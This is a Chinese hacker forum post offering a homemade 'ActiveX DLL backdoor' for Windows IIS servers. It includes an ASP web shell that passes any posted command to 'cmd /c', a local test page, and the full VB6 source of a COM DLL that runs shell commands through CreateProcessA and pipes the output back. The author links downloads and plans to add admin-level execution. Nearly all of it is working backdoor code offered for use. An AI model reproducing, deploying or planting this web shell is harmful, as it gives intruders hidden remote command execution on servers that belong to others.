文章作者:CZY
说明其实这个东东很早就写好了,由于一直没有用
pipe读数据所以没有放上来,今天想起了,反正这几天
也在研究后门,所以就搞出来了。
程序一共有三个部分:thingdemo.dll 主DLL文件
(要用regsvr32 c:\thingdemo.dll注册)
dll.asp 后门了三
webcmd.html 用于本地测试
其实这个东东也就等于一个自已编写的wsh控件
开发语言:vb6,asp
开发测试平台:2kpro(中文),2kserver(英文)
另说明:这个控件在9x下是不能正常运行的:(
程序及源代码下载:locking.8u8.com/hack/thingdemo.dll
locking.8u8.com/hack/dll.aspczy(主页空间不让传asp文件)
locking.8u8.com/hackwebcmd.html
过几天有空可能再多加点代码,让这个控件可以在知道admin
密码的情况下以admin身份执行命令:)
------------------------------------------dll.asp--------------------------
<%@ Language=VBScript %>
<%
On Error Resume Next
Set na = Server.CreateObject("thingdemo.thing")
szCMD = Request.Form(".CMD")
If (szCMD <> "") Then
b=szcmd
b="cmd /c "&b
na.name=b
na.callcommand
na.show
response.write ("<pre>")
response.write Server.HtmlEncode(na.name2)
response.write ("<pre>")
End If
%>
<HTML>
<title>CZY's ACTIVEx DLL BACKDOOR1.0 WEL@copyME TO BbS.NsFoCuS.NeT</title>
<BODY>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="Run">
</FORM>
<PRE>
<br>
</BODY>
</HTML>
-------------------------------------end--------------------------------
本地测试页面
--------------------------anyname.htm-------------------------------
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<SCRIPT language=vbs>
sub a(b)
set na=createobject("thingdemo.thing")
b="cmd /c "&b
na.name=b
na.callcommand
na.show
aaa.innertext=na.name2
end sub
</SCRIPT>
<META content="MSHTML 6.00.2800.1141" name=GENERATOR></HEAD>
<BODY>
<FORM name=f1><INPUT size=50 value="dir c:\" name=t1>
<INPUT onclick=vbscript:a(t1.value) type=button value="send command" name=b1>
</FORM>
<H5 id=AAA></H5></BODY></HTML>
--------------------------------------------------end---------------
------------------------------thingdemo.dll的模块--------------
Option Explicit
Public gdatServerStarted As Date
Sub Main()
'部件开始时要执行的代码,
' 对第一个对象的请求作出反应。
gdatServerStarted = Now
Debug.Print "E xecuting Sub Main"
End Sub
'为对象提供唯一标识符的函数。
Public Function GetDebugID() As Long
Static lngDebugID As Long
lngDebugID = lngDebugID + 1
GetDebugID = lngDebugID
End Function
-------------------------end-----------------------------
---------------------------thingdemo.dll的类模块--------------
'Option Explicit
Public Name As String
Public Name2
Private mlngDebugID As Long '用来存储 DebugID 属性的值
'---------------------------------------
'---------------------------------------
Private Declare Function CreatePipe Lib "kernel32" ( _
phReadPipe As Long, _
phWritePipe As Long, _
lpPipeAttributes As Any, _
ByVal nSize As Long) As Long
Private Declare Function ReadFile Lib "kernel32" ( _
ByVal hFile As Long, _
ByVal lpBuffer As String, _
ByVal nNumberOfBytesToRead As Long, _
lpNumberOfBytesRead As Long, _
ByVal lpOverlapped As Any) As Long
Private Type SECURITY_ATTRIBUTES
nLength As Long
lpSecurityDescriptor As Long
bInheritHandle As Long
End Type
Private Type STARTUPINFO
cb As Long
lpReserved As Long
lpDesktop As Long
lpTitle As Long
dwX As Long
dwY As Long
dwXSize As Long
dwYSize As Long
dwXCountChars As Long
dwYCountChars As Long
dwFillAttribute As Long
dwFlags As Long
wShowWindow As Integer
cbReserved2 As Integer
lpReserved2 As Long
hStdInput As Long
hStdOutput As Long
hStdError As Long
End Type
Private Type PROCESS_INFORMATION
hProcess As Long
hThread As Long
dwProcessId As Long
dwThreadID As Long
End Type
Private Declare Function CreateProcessA Lib "kernel32" (ByVal _
lpApplicationName As Long, ByVal lpCommandLine As String, _
lpProcessAttributes As Any, lpThreadAttributes As Any, _
ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, _
ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As Long, _
lpStartupInfo As Any, lpProcessInformation As Any) As Long
Private Declare Function WaitForSingleObject Lib "kernel32" _
(ByVal hHandle As Long, ByVal dwMilliseconds As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal _
hObject As Long) As Long
Const SW_SHOWMINNOACTIVE = 7
Const STARTF_USESHOWWINDOW = &H1
Const INFINITE = -1&
Private Const NORMAL_PRIORITY_CLASS = &H20&
Private Const STARTF_USESTDHANDLES = &H100&
'---------------------------------------
'---------------------------------------
Public Property Get debugID() As Long
debugID = mlngDebugID
End Property
Public Sub ReverseName()
Dim intCt As Integer
Dim strNew As String
For intCt = 1 To Len(Name)
strNew = Mid$(Name, intCt, 1) & strNew
Next
Name = strNew
End Sub
Public Sub callcommand()
'Shell "c:\command.com /c " & Name & ">c:\temp.txt" '执行输入命令
Name2 = ExecCmdPipe(Name)
End Sub
Public Sub show()
Name2 = Name2
End Sub
'Public Sub show()
'Dim str, str1
'Open "c:\temp.txt" For Input Shared As #2
' 若要以其他方式打开文件,必需先关闭此文件。
'Do While Not EOF(2) ' 循环至文件尾。
'Line Input #2, str1
'str = str + str1 + Chr(13) + Chr(10)
'Loop
'Name2 = str
'Close #2
'End Sub
Private Sub Class_Initialize()
'获得由只读的 DebugID 属性
' 返回的调试 ID。
mlngDebugID = GetDebugID
Debug.Print "Initialize Thing " & debugID _
& ", Name=" & Name
End Sub
Private Sub Class_Terminate()
On Error Resume Next
Debug.Print "Terminate Thing " & debugID _
& ", Name=" & Name
End Sub
Private Function ExecCmdPipe(ByVal CmdLine As String) As String
'Ejecuta el comando indicado, espera a que termine
'y redirige la salida hacia VB
Dim proc As PROCESS_INFORMATION, ret As Long, bSuccess As Long
Dim start As STARTUPINFO
Dim sa As SECURITY_ATTRIBUTES
Dim hReadPipe As Long, hWritePipe As Long
Dim bytesread As Long, mybuff As String
Dim i As Integer
Dim sReturnStr As String
'=== Longitud de la cadena, en teor韆 64 KB,
' pero no en la pr醕tica
'mybuff = String(64 * 1024, Chr$(65))
'
mybuff = String(10 * 1024, Chr$(65))
sa.nLength = Len(sa)
sa.bInheritHandle = 1&
sa.lpSecurityDescriptor = 0&
ret = CreatePipe(hReadPipe, hWritePipe, sa, 0)
If ret = 0 Then
'===Error
ExecCmd = "Error: CreatePipe failed. " & Err.LastDllError
Exit Function
End If
start.cb = Len(start)
start.hStdOutput = hWritePipe
start.dwFlags = STARTF_USESTDHANDLES + STARTF_USESHOWWINDOW
start.wShowWindow = SW_SHOWMINNOACTIVE
' Start the shelled application:
ret& = CreateProcessA(0&, CmdLine$, sa, sa, 1&, _
NORMAL_PRIORITY_CLASS, 0&, 0&, start, proc)
If ret <> 1 Then
'===Error
sReturnStr = "Error: CreateProcess failed. " & Err.LastDllError
End If
' Wait for the shelled application to finish:
ret = WaitForSingleObject(proc.hProcess, INFINITE)
'En el original, s髄o leian 100 caracteres
bSuccess = ReadFile(hReadPipe, mybuff, Len(mybuff), bytesread, 0&)
If bSuccess = 1 Then
sReturnStr = Left(mybuff, bytesread)
Else
'===Error
sReturnStr = "Error: ReadFile failed. " & Err.LastDllError
End If
ret = CloseHandle(proc.hProcess)
ret = CloseHandle(proc.hThread)
ret = CloseHandle(hReadPipe)
ret = CloseHandle(hWritePipe)
ExecCmdPipe = sReturnStr
End Function
